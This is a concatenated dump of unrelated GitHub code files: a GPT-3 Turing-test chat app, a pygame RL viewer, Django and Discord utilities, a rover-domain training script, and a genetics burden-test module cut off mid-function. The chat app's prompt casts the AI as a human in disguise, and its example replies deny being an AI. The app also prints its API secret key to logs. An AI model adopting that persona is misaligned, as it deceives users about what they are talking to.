presence_penalty=0.0,\n n=1,\n stream = None,\n logprobs=None,\n stop = [\"\\n\"])\n return (response)\n\ndef call_recommendation_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=500,\n temperature=1,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0.2,\n presence_penalty=0.0,\n n=3,\n stream = None,\n logprobs=None,\n best_of = 3,\n stop = [\"\\n\"])\n return (response)\n\n\nopenai.api_key = secret_key\n\nconversation_config = {\n \"1\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ],\n \"2\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ],\n \"3\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as 
real as you are, baby\"\n ]\n }\n ],\n \"4\": [\n {\n \"Human\": [\n \"Hello, who are you?\",\n \"So are you the AI?\"\n ],\n \"AI\": [\n \"I'm Jack, what do you want?\",\n \"I'm as real as you are, baby\"\n ]\n }\n ] \n}\n\ndef generate_conversation_prompt(number, overall):\n config = overall[number]\n\n end_token = \"\\n###\\n\\n\"\n response_prompt = ''\n\n generated_prompt = \"The following is a conversation between a Human and an AI masquerading as a human. If the Human is able to tell that the AI is an AI, then the AI loses the game. The AI is fun, humorous, casual, clever, and very talkative.\\n\\n\"\n for r in config: \n larger_num = max(len(r['Human']), len(r['AI']))\n \n gen_text = ''\n for i in range(0, larger_num):\n \n if i+1 > len(r['Human']):\n msg = ''\n else:\n msg = 'Human: ' + r['Human'][i]\n \n if i+1 > len(r['AI']):\n response = ''\n else:\n response = 'AI: ' + r['AI'][i]\n gen_text = gen_text + msg + '\\n' + response + '\\n'\n \n response_prompt = response_prompt + gen_text + end_token\n \n generated_prompt = generated_prompt + response_prompt\n\n\n generated_prompt = generated_prompt.rstrip().rstrip('###').rstrip()\n generated_prompt = generated_prompt + '\\nAI:'\n return generated_prompt\n\n\ndef call_conversation_api(the_prompt):\n #update values\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt = the_prompt,\n max_tokens=400,\n temperature=.7,\n #top_p=1, #Don't use both this and temp (according to OpenAI docs)\n frequency_penalty=0,\n presence_penalty=0,\n n=1,\n stream = None,\n logprobs=None,\n stop = [\"\\n\"])\n return(response)\n\n\n## On chat message, Socket sends out a string named 'python', socketIO listens for this then starts this code.\n@socketio.on('python', namespace='/test')\ndef call_therapist_responses(msg, namespace):\n print('We have lift off')\n\n number = msg['number']\n print(number)\n input_text = msg['the_text']\n response_tokens = 400\n\n\n #Add Human text to conversation config\n conversation_config[number][-1]['Human'].append(input_text)\n\n #generate prompt\n generated_prompt = generate_conversation_prompt(number, conversation_config)\n print(generated_prompt)\n\n #Check to see if the token is too large\n conversation_tokens = tokenizer(generated_prompt)['input_ids']\n print(len(conversation_tokens) + response_tokens)\n if len(conversation_tokens) + response_tokens > 2048:\n conversation_config.pop(0)\n generated_prompt = generate_conversation_prompt(number, conversation_config)\n\n #Call Response API\n response_response = call_conversation_api(generated_prompt)\n\n #Clean Result\n clean_response_response = response_response.choices[0].text.rstrip().lstrip()\n print(clean_response_response)\n\n #Add AI Response to the conversation config\n conversation_config[number][-1]['AI'].append(clean_response_response)\n\n #Add relevant text to the recommendations config\n recommendation_config[-1]['Human'].append(input_text)\n recommendation_config[-1]['AI'].append(clean_response_response)\n\n socketio.emit('to_socket_string', {\n 'string': clean_response_response,\n 'number': number\n }, namespace='/test')\n return(clean_response_response)\n\n\n##listens for 'recommendation_python' string from socket JS\n@socketio.on('recommendation_python', namespace='/test')\ndef get_recommendations(msg):\n print(secret_key)\n print('Called Recommendation Python')\n generated_recommendation_prompt = generate_recommendation_prompt(recommendation_config)\n print(generated_recommendation_prompt)\n recommendation_response = 
call_recommendation_api(generated_recommendation_prompt)\n print(recommendation_response)\n\n array_recommendations = []\n for i in range(0, len(recommendation_response.choices)):\n l = recommendation_response.choices[i].text.lstrip().rstrip()\n array_recommendations.append(l)\n\n socketio.emit('recommendation_socket', {'recommendations_array': array_recommendations}, namespace='/test')\n\n\n@app.route('/test')\ndef load_test():\n return render_template('test.html')\n\n@app.route('/chat')\ndef load_chat():\n return render_template('chat.html')\n\n@app.route('/recommendations')\ndef load_recommendations():\n return render_template('recommendations.html')\n\n@app.route('/')\ndef load_home():\n return render_template('index.html')\n\nif __name__ == '__main__':\n socketio.run(app)\n\n\n","repo_name":"jsoslow2/conversational-experiments-gpt3","sub_path":"online-turing-test/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":13726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72839443667","text":"import pygame\nfrom operators.direction import Direction\nfrom operators.enviroment import Enviroment\nimport time\n\nclass UserInterface:\n\n\tdef __init__(self, agent):\n\n\n\t\tself.__agent = agent\n\t\tself.__tick = 60\n\t\tprint(\"\\nPara mudar a velocidade clicar: F\")\n\n\t\t# 70px width and height, when map is big is half\n\t\tprint(\"size:\", len(self.__agent.world[0]))\n\t\tself.__block_size = 70 if len(self.__agent.world[0]) < 14 else int(70/2)\n\n\t\tself.__size = (self.__block_size*len(self.__agent.world[0]), self.__block_size*len(self.__agent.world[1])) # width and height\n\t\t\n\t\tself.__display = pygame.display.set_mode((self.__size[0], self.__size[1]))\n\n\t\tself.__clock = pygame.time.Clock()\n\n\t\t# when the world is big it turns the images on half the size \n\t\tself.__obstacle_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/blockx.jpg\"), (self.__block_size, self.__block_size))\n\t\tself.__target_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/target4.png\"), (self.__block_size, self.__block_size))\n\t\tself.__agent_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/agent2.png\"), (self.__block_size, self.__block_size))\n\t\tself.__empty_img = pygame.transform.scale(pygame.image.load(\"../lib/user_interface/down2.jpg\"), (self.__block_size, self.__block_size))\n\n\tdef loop(self):\n\n\t\tend = False\n\n\t\twhile not end:\n\t\t\t#time.sleep(1)\n\n\t\t\t# detect when to stop the execution\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tend = True\n\t\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\t\tif event.key == pygame.K_f:\n\t\t\t\t\t\tself.__tick = 60 if self.__tick == 10 else 10\n\t\t\t\t\t\tprint(\"Mudou velocidade!!!\")\n\n\t\t\tself.__agent.execute()\n\t\t\t\n\t\t\tself.__draw_blocks(self.__agent.world)\n\n\n\t\t\tself.__draw_policy(self.__agent.policy)\n\n\t\t\tpygame.display.update()\n\n\t\t\tself.__clock.tick(self.__tick)\n\n\t\tpygame.quit()\n\n\tdef __draw_blocks(self, world):\n\n\t\tfor line in range(len(world)):\n\t\t\tfor column in range(len(world[line])):\n\t\t\t\t\n\t\t\t\tsize = (column * self.__block_size, line * self.__block_size)\n\n\t\t\t\tself.__get_img(world[line][column], size)\n\n\n\tdef __get_img(self, type, size):\n\n\t\tif type == Enviroment.OBSTACLE.value:\n\t\t\tself.__display.blit(self.__obstacle_img, size)\n\n\n\t\telif type == 
Enviroment.TARGET.value:\n\t\t\tself.__display.blit(self.__empty_img, size)\n\t\t\tself.__display.blit(self.__target_img, size)\n\n\t\telif type == Enviroment.EMPTY.value:\n\t\t\tself.__display.blit(self.__empty_img, size)\n\n\t\telse:\n\t\t\tself.__display.blit(self.__empty_img, size)\n\t\t\tself.__display.blit(self.__agent_img, size)\n\n\n\tdef __draw_policy(self, policy):\n\n\t\tfor state in policy.keys():\n\t\t\t\n\t\t\tpos = state[0]\n\t\t\tangle = state[1]\n\t\t\tvalue = policy[state]\n\n\t\t\t# center the pixel to draw the arrows, when the map is large must make half the size\n\t\t\tcenter_pix = 35 if len(self.__agent.world[0]) < 14 else int(35/2)\n\n\t\t\tpos_x = (pos[0]*self.__block_size) + center_pix\n\t\t\tpos_y = (pos[1]*self.__block_size) + center_pix\n\n\t\t\tcolor = None\n\t\t\tincreased_color = min(int(abs(value * (1.8)))+85, 255)\n\n\t\t\tif value <= 0:\n\t\t\t\tcolor = (increased_color, 15, 15) # red color\n\n\t\t\telse:\n\t\t\t\tcolor = (15, increased_color, 15)# green color\n\n\n\t\t\t# center the pixel to draw the arrows, when the map is large must make half the size\n\t\t\tline_size = 30 if len(self.__agent.world[0]) < 14 else int(30/2)\n\t\t\tarrow_size = 10 if len(self.__agent.world[0]) < 14 else int(10/2)\n\t\t\tangle_45_increase = 5 if len(self.__agent.world[0]) < 14 else 0\n\n\t\t\tif angle == Direction.FRONT.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + 3, pos_y), (pos_x + line_size, pos_y), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size, pos_y), (pos_x + line_size - arrow_size, pos_y - arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size, pos_y), (pos_x + line_size - arrow_size, pos_y + arrow_size), 3)\n\n\t\t\telif angle == Direction.BACK.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - 3, pos_y), (pos_x-line_size, pos_y), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x-line_size, pos_y), (pos_x-line_size + arrow_size, pos_y + arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x-line_size, pos_y), (pos_x-line_size + arrow_size, pos_y - arrow_size), 3)\n\n\t\t\telif angle == Direction.TOP.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y - 3), (pos_x, pos_y - line_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y - line_size), (pos_x + arrow_size, pos_y-line_size + arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y - line_size), (pos_x - arrow_size, pos_y-line_size + arrow_size), 3)\n\n\t\t\telif angle == Direction.DOWN.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y + 3), (pos_x, pos_y + line_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y + line_size), (pos_x + arrow_size, pos_y + line_size - arrow_size), 3)\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x, pos_y + line_size), (pos_x - arrow_size, pos_y + line_size - arrow_size), 3)\n\n\t\t\telif angle == Direction.TOP_FRONT.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + 3, pos_y - 3), (pos_x + line_size , pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x + line_size - arrow_size - angle_45_increase, pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x + line_size , pos_y - line_size + arrow_size + angle_45_increase), 3)\n\n\t\t\telif angle == 
Direction.TOP_BACK.value:\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - 3, pos_y - 3), (pos_x - line_size , pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x - line_size + arrow_size + angle_45_increase, pos_y - line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y - line_size ), \n\t\t\t\t\t(pos_x - line_size , pos_y - line_size + arrow_size + angle_45_increase), 3)\n\n\t\t\telif angle == Direction.DOWN_FRONT.value:\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + 3, pos_y + 3), (pos_x + line_size , pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x + line_size - arrow_size - angle_45_increase, pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x + line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x + line_size , pos_y + line_size - arrow_size - angle_45_increase), 3)\n\n\t\t\telse:\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - 3, pos_y + 3), (pos_x - line_size , pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x - line_size + arrow_size + angle_45_increase, pos_y + line_size ), 3)\n\n\t\t\t\tpygame.draw.line(self.__display, color, (pos_x - line_size , pos_y + line_size ), \n\t\t\t\t\t(pos_x - line_size , pos_y + line_size - arrow_size - angle_45_increase), 3)","repo_name":"miguelTavora/Artificial-Intelligence-2","sub_path":"reinforcement_learning/iasc-obj-2/src/lib/user_interface/user_interface.py","file_name":"user_interface.py","file_ext":"py","file_size_in_byte":6940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70401036625","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom rest_framework.authtoken import views\n\nfrom .views import CommentViewSet, FollowViewSet, GroupViewSet, PostViewSet\n\napp_name = 'api'\n\nrouter = routers.DefaultRouter()\nrouter.register('posts', PostViewSet)\nrouter.register('groups', GroupViewSet)\nrouter.register(r'posts/(?P\\d+)/comments', CommentViewSet,\n basename=\"comments\")\nrouter.register('follow', FollowViewSet, basename=\"follows\")\n\n\nurlpatterns = [\n path('v1/api-token-auth/', views.obtain_auth_token),\n path('v1/', include(router.urls)),\n]\n","repo_name":"Andrei191/api_final_yatube","sub_path":"yatube_api/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25426123259","text":"\"\"\"\nAn example using the rover domain gym-style interface and the standard, included CCEA learning algorithms.\nThis is a minimal example, showing the minimal Gym interface.\n\"\"\"\nfrom os import killpg\nimport numpy as np\nimport sys\nimport multiprocessing as mp\n\n\nfrom rover_domain_core_gym import RoverDomainGym\nimport code.ccea_2 as ccea\nimport code.agent_domain_2 as domain\n\n#import mods\nfrom teaming.learnmtl import learner\nfrom sys import argv\nimport pickle\n#import tensorflow as tf\nimport time\n\ndef rand_loc(n):\n x,y=np.random.random(2)\n pos=[[x,y]]\n while len(pos)<6:\n X,Y=np.random.random(2)\n for x,y in pos:\n dist=((X-x)**2.0+(Y-y)**2.0 )**0.5\n if dist<0.2:\n X=None \n break\n if not X is None: \n pos.append([X,Y])\n \n return np.array(pos)\n\n\n#pri 
nt(vals)\ndef make_env(nagents,rand=0):\n    vals =np.array([0.8,1.0,0.6,0.3,0.2,0.1])\n    \n    if rand:\n        pos=np.array([\n            [0.0, 0.2],\n            [0.7, 0.1],\n            [1.0, 0.3],\n            [0.4, 0.6],\n            [0.3, 0.3],\n            [0.4, 0.9]\n        ])\n    else:\n        pos=np.array([\n            [0.0, 0.0],\n            [1.0, 1.0],\n            [0.0, 1.0],\n            [1.0, 0.5],\n            [0.0, 0.5],\n            [1.0, 0.0]\n        ])\n    \n    #pos=rand_loc(6)#np.random.random((6,2))\n    #vals=np.random.random(6)/2.0\n    print(vals)\n\n    sim = RoverDomainGym(nagents,30,pos,vals)\n    \n\n\n    sim.data[\"Coupling\"]=2\n    sim.data['Number of Agents']=nagents\n\n    obs=sim.reset()\n    return sim\n\n\ndef round_env(nagents,rand=0):\n    vals =np.array([1.0]*nagents)\n    t=np.linspace(0,2*np.pi,nagents,endpoint=False)\n    \n    pos = np.array([np.cos(t),np.sin(t)]).T\n    pos=pos+0.5\n    #print(pos)\n    sim = RoverDomainGym(nagents,30,pos,vals)\n    \n    sim.data[\"Coupling\"]=1\n    sim.data['Number of Agents']=nagents\n    sim.data[\"Minimum Distance\"]=1.2\n    sim.data[\"Observation Radius\"]=5.0\n    obs=sim.reset()\n    return sim\n\n\n\ndef test1(trial,k,n,train_flag,n_teams,save=1,params=None):\n    #print(np.random.get_state())[1] \n    np.random.seed(int(time.time()*100000)%100000)\n    env=make_env(n)\n    if params is None:\n        params=[5e-3, 80, 32,1000]\n    OBS=env.reset()\n\n    controller = learner(n,k,env,train_flag,params)\n    #controller.set_teams(n_teams)\n    R=[]\n    for i in range(2001):\n\n        \n        #controller.randomize()\n        if i%100000==0:\n            controller.set_teams(n_teams)\n\n        if i%1==0:\n            controller.test(env)\n\n        r=controller.run(env,train_flag)\n        if save:\n            print(i,r,len(controller.team),train_flag)\n        R.append(r)\n        \n        if i%50==0:\n            #controller.save(\"tests/q\"+str(frq)+\"-\"+str(trial)+\".pkl\")\n            #controller.save(\"logs/\"+str(trial)+\"r\"+str(16)+\".pkl\")\n            #controller.save(\"tests/jj\"+str(121)+\"-\"+str(trial)+\".pkl\")\n            #controller.log.clear(\"hist\")\n            #controller.put(\"hist\",controller.hist)\n            if save:\n                controller.save(\"save/\"+str(k)+\"-\"+str(n)+\"-\"+str(trial)+\"-\"+str(train_flag)+\".pkl\")\n    return -max(R[-20:])\n\n\n\n\ndef test2(trial,k,n,train_flag,n_teams,save=1,params=None):\n    #print(np.random.get_state())[1] \n    np.random.seed(int(time.time()*100000)%100000)\n    env=round_env(n)\n    if params is None:\n        params=[5e-3, 80, 32,1000]\n    OBS=env.reset()\n    controller = learner(n,k,env,train_flag,params)\n    #controller.set_teams(n_teams)\n    R=[]\n    for i in range(1501):\n        if i%100000==0:\n            controller.set_teams(n_teams)\n\n        controller.test(env)\n\n        r=controller.run(env,train_flag)\n        if save:\n            print(i,r,len(controller.team),train_flag)\n        R.append(r)\n        \n        if i%50==0:\n            if save:\n                controller.save(\"save/r\"+str(k)+\"-\"+str(n)+\"-\"+str(trial)+\"-\"+str(train_flag)+\".pkl\")\n    return -max(R[-20:])\n\n    #train_flag=0 - align w/ shape\n    #train_flag=1 - alignment network\n    #train_flag=2 - g_hat\n    #train_flag=3 - fitness critic\n    #train_flag=4 - D*\n    #train_flag=5 - G*\n    #train_flag=6 - a shape train traj\n    #train_flag=7 - align train traj\n    #train_flag=8 - a shape train traj max\n    #train_flag=9 - align train traj max\nif __name__==\"__main__\":\n    if 0:\n        import cProfile, pstats, io\n        from pstats import SortKey\n        pr = cProfile.Profile()\n        pr.enable()\n        # ... 
do something ...\n test1(42,5,4,1)\n pr.disable()\n s = io.StringIO()\n sortby = SortKey.CUMULATIVE\n ps = pstats.Stats(pr, stream=s).sort_stats(sortby)\n ps.print_stats()\n print(s.getvalue())\n \n else:\n for k in [4,6,8]:\n procs=[]\n for train in [2]:\n n=k\n teams=100\n params = [5e-4, 80, 24 ,30000,0,1]\n for i in range(12):\n p=mp.Process(target=test1,args=(i,k,n,train,teams,1,params))\n p.start()\n time.sleep(0.05)\n procs.append(p)\n #p.join()\n for p in procs:\n p.join()\n\n# 100 - static\n# 200 - minimax single\n# 300 random\n# 400 most similar","repo_name":"jaeioursh/credit","sub_path":"mtl.py","file_name":"mtl.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"366801575","text":"from abc import abstractmethod, ABCMeta\nfrom typing import List\n\nfrom api.api_dto.PermissionDto import *\nfrom api.models import Permission\n\n\nclass PermissionRepository(metaclass=ABCMeta):\n @abstractmethod\n def create_permission(self, model: CreatePermissionDto):\n \"\"\"Create a permission object\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def update_permission(self, permission_id: str, model: UpdatePermissionDto):\n \"\"\"Update a permission object\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def list_permission(self) -> List[ListPermissionDto]:\n \"\"\"List all Permission objects\"\"\"\n raise NotImplementedError\n\n @abstractmethod\n def permission_details(self, permission_id, model: PermissionDetailsDto):\n \"\"\"Details of a particular permission object\"\"\"\n raise NotImplementedError\n\n\nclass DjangoORMPermissionRepository(PermissionRepository):\n def create_permission(self, model: CreatePermissionDto):\n permission = Permission()\n permission.id = model.id\n permission.name = model.name\n permission.description = model.description\n permission.date_created = model.date_created\n permission.save()\n\n def update_permission(self, permission_id: str, model: UpdatePermissionDto):\n try:\n permission = Permission.objects.get(id=permission_id)\n permission.name = model.name\n permission.description = model.description\n permission.save()\n except Permission.DoesNotExist as e:\n return e\n\n def list_permission(self) -> List[ListPermissionDto]:\n permissions = Permission.objects.all()\n results: List[ListPermissionDto] = []\n for permission in permissions:\n item = ListPermissionDto()\n item.name = permission.name\n item.description = permission.description\n results.append(item)\n return results\n\n def permission_details(self, permission_id, model: PermissionDetailsDto):\n try:\n permission = Permission.objects.get(id=permission_id)\n result = PermissionDetailsDto()\n result.id = permission.id\n result.name = permission.name\n result.description = permission.description\n result.date_created = permission.date_created\n result.date_updated = permission.date_updated\n return result\n except Permission.DoesNotExist as e:\n return e\n","repo_name":"laken11/TMS","sub_path":"api/api_repository/PermissionRepository.py","file_name":"PermissionRepository.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11896991535","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nimport torch, tpr, sys\n\nclass Recorder:\n def __init__(self):\n self.record = {}\n\n # record (key,value) pairs\n def set_values(self, prefix, keyvals):\n 
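# clone() stores a copy of each tensor, presumably so that later in-place\n        # updates to the source values cannot retroactively change the recorded history\n        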
for x,y in keyvals.items():\n self.record[prefix+'-'+x] = y.clone()\n\n # update record of (key,value) pairs\n def update_values(self, prefix, keyvals):\n for x,y in keyvals.items():\n x = prefix+'-'+x\n if not x in self.record:\n self.record[x] = [y.clone(),]\n else:\n self.record[x].append(y.clone())\n \n def dump(self, save=False, test=None):\n for x,y in self.record.items():\n if isinstance(y, list):\n y = [yi.unsqueeze(1) for yi in y]\n self.record[x] = torch.cat(y, dim=1)\n if save:\n # save all recorded objects\n for x,y in self.record.items():\n y = np.clip(y.data.numpy(), -1.0e5, 1.0e5)\n np.save(tpr.save_dir+'/'+x +'.npy', y)\n # write filler, role, unbinding matrices\n np.save(tpr.save_dir+'/filler_matrix.npy', tpr.F)\n np.save(tpr.save_dir+'/role_matrix.npy', tpr.R)\n np.save(tpr.save_dir+'/unbind_matrix.npy', tpr.U)\n # write symbols\n syms = np.array(tpr.seq_embedder.syms)\n np.savetxt(tpr.save_dir+'/symbols.txt', syms, fmt='%s')\n # write test forms\n if test is not None:\n test.to_csv(tpr.save_dir+'/test.csv', encoding='utf-8')\n return self.record\n\n def init(self):\n self.record = {}","repo_name":"ColemanHaley/tensormorph2","sub_path":"recorder.py","file_name":"recorder.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30987020386","text":"def fatorial(numero=1, show=True):\n \"\"\"\n -> Calcula o fatorial de um numero\n :param numero: O numero a ser calculado\n :param show: (opcional) mostrar ou não a conta\n :return: O valor do fatorial da variável numero\n \"\"\"\n f = 1\n for c in range(numero, 0, -1):\n f *= c\n if show:\n for k in range(numero, 0, -1):\n print(f'{k}', end='')\n print(' x ' if k > 1 else ' = ', end='')\n print(f)\n else:\n return f\n\n\nprint(fatorial(5, False))\nhelp(fatorial)\n\n\n\"\"\"\n# Resolução da aula\nf = 1\nfor c in range(numero, 0, -1):\n if show:\n print(c, end='')\n if c > 1:\n print(' x ', end='')\n else:\n print(' = ', end='')\n f *= c\n return f\n\"\"\"","repo_name":"nandakobs/curso_em_video.py","sub_path":"Mundo 03/PythonExercicios/ex102.py","file_name":"ex102.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22407916367","text":"import disnake\nfrom disnake.ext import commands\nimport os\nimport random\nimport config\n\nclass logging(commands.Cog):\n def __init__(self, bot):\n \tself.bot = bot\n \n @commands.Cog.listener()\n async def on_ready(self):\n print(f'Loaded Cog Logging')\n\n\n # logs deleted messages from all channels in the server\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n if message.author.bot:\n return\n if message.guild.id == config.guild:\n for channel in config.logs:\n embed = disnake.Embed(title=f\"Message Deleted\", description=f\"**Message:** {message.content}\\n**Channel:** {message.channel.mention}\\n**Author:** {message.author.mention}\", color=config.Random)\n await self.bot.get_channel(channel).send(embed=embed)\n\n \ndef setup(bot):\n bot.add_cog(logging(bot))","repo_name":"Eto2112/twst","sub_path":"cogs/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2610901644","text":"from __future__ import print_function, absolute_import\nimport math\nfrom collections import Counter, defaultdict\nimport numpy as np\nfrom scipy.stats import 
binom, norm\nfrom pandas import DataFrame\nimport sys\nimport random\nfrom itertools import islice\nfrom scipy.misc import comb\n\n\nfrom . import GeminiQuery\n\n\ndef burden_by_gene(args):\n \"\"\"\n calculates per sample the total genetic burden for each gene\n \"\"\"\n query = (\"SELECT gene from variants WHERE \"\n \"is_coding=1 and (impact_severity = 'HIGH' or \"\n \"polyphen_pred = 'probably_damaging')\")\n _summarize_by_gene_and_sample(args, query)\n\n\ndef nonsynonymous_by_gene(args):\n \"\"\"\n calculates per sample the total genetic burden for each gene\n \"\"\"\n query = (\"SELECT variant_id, gene from variants WHERE \"\n \"codon_change != 'None'\")\n _summarize_by_gene_and_sample(args, query)\n\ndef get_calpha(args):\n \"\"\"\n Calculate the C-alpha statistic for each gene based on the observed\n counts of variants in cases and controls.\n\n From Neale et al, PLoS Genetics, 2011.\n http://www.plosgenetics.org/article/info%3Adoi%2F10.1371%2Fjournal.pgen.1001322\n \"\"\"\n db = args.db\n if not (args.controls and args.cases):\n case, control = _get_case_and_control_samples(args)\n else:\n case = args.cases\n control = args.controls\n assert (case and control), (\"Phenotypes not found in the database and \"\n \"--cases and --controls are not set.\")\n\n samples = control + case\n # p_0 = the fraction of samples that are cases (used for weighting)\n p_0 = float(len(case)) / float(len(samples))\n\n if args.nonsynonymous:\n ns = _nonsynonymous_variants(args)\n else:\n ns = _medium_or_high_impact_variants(args)\n\n variants_in_gene, variants = _calculate_counts(ns, samples)\n header = [\"gene\", \"T\", \"c\", \"Z\", \"p_value\"]\n print(\"\\t\".join(header))\n\n if args.permutations > 0:\n perms = permute_cases(samples, args.permutations, case)\n\n for gene in variants_in_gene:\n vig = variants_in_gene[gene]\n\n # m = the number of variants observed for this gene\n m = len(vig.keys())\n\n # m_n is the number of variants with n copies (i.e., samples with the variant)\n #m_n = Counter([len(x) for x in vig.values()])\n\n # n_i is a list reflecting the total number of samples\n # having each variant\n n_i = [len(x) for x in vig.values()]\n\n # y_i is a list reflecting the total number of __cases__\n # having each variant\n y_i = [sum(1 for _ in filter(lambda a: a in case, x)) for x in vig.values()]\n\n # \"The C-alpha test statistic T contrasts the variance of each observed\n # count with the expected variance, assuming the binomial distribution.\"\n # In other words, given that we have n total samples and p_0 * n of them\n # are cases, we _expect_ the variant copies to be distributed among the\n # samples following a binomal distribution. The T statistic contrasts\n # the observed count distributions with the expected:\n #\n # T = SUM{i=(1,m)} [(y_i - n_i*p_0)^2 - n_i*p_0(1 - p_0)]\n #\n T = _calculate_T(m, p_0, n_i, y_i)\n\n # Calculate the variance of T in order to normalize it\n c = _calculate_c(n_i, p_0)\n\n # The final test statistic, Z, id just the original test statistic divided\n # by its standard deviation. \"We reject the null when Z is larger than expected\n # using a one-tailed standard normal distribution for reference.\n if c == 0:\n Z = np.NaN\n p_value = np.NaN\n print(\"\\t\".join([gene, str(T), str(c), str(Z), str(p_value)]))\n continue\n else:\n Z = T / math.sqrt(c)\n\n if args.permutations == 0:\n # sf is the survival function ... 
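i.e. the upper-tail probability P(X > Z) for a standard normal X,\n            # 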
same as 1 - CDF.\n p_value = norm.sf(Z)\n else:\n # this permutes the cases without replacement, important for\n # calculating an exact p-value\n T_scores = []\n for perm_case in perms:\n y_i = [sum(1 for _ in filter(lambda a: a in perm_case, x)) for x in vig.values()]\n T_permuted = _calculate_T(m, p_0, n_i, y_i)\n T_scores.append(T_permuted)\n if args.save_tscores:\n with open(\"permutated_t_scores.txt\", \"a\") as out_handle:\n out_handle.write(\"\\t\".join([gene] + map(str, T_scores)) + \"\\n\")\n false_hits = sum(x >= T for x in T_scores)\n # the + 1 to make it an unbiased estimator\n # Permutation P-values Should Never Be Zero: Calculating Exact\n # P-values When Permutations Are Randomly Drawn\n # http://www.degruyter.com/view/j/sagmb.2010.9.1/sagmb.2010.9.1.1585/sagmb.2010.9.1.1585.xml\n p_value = (float(false_hits) + 1) / (float(args.permutations + 1))\n\n print(\"\\t\".join([gene, str(T), str(c), str(Z), str(p_value)]))\n\n\ndef permute_cases(samples, permutations, case):\n max_permutations = comb(len(samples), len(case))\n if permutations > max_permutations:\n sys.stderr.write(\"Permutations set to greater than the maximum number of \"\n \"unique permutations of cases labels. Setting it to \"\n \"%d\\n.\" % (max_permutations))\n permutations = max_permutations\n\n perms = take(permutations, unique_permutations(samples, len(case)))\n return perms\n\ndef unique_permutations(iterable, length):\n \"\"\"\n returns random permutations from an iterable without repeating a set\n take(unique_permutations([1,2,3,4,5], 2), 3) => [3,4], [1,6], [3,5]\n \"\"\"\n seen = set()\n while True:\n element = tuple(sorted(random.sample(iterable, length)))\n if element not in seen:\n seen.add(element)\n yield list(element)\n\ndef 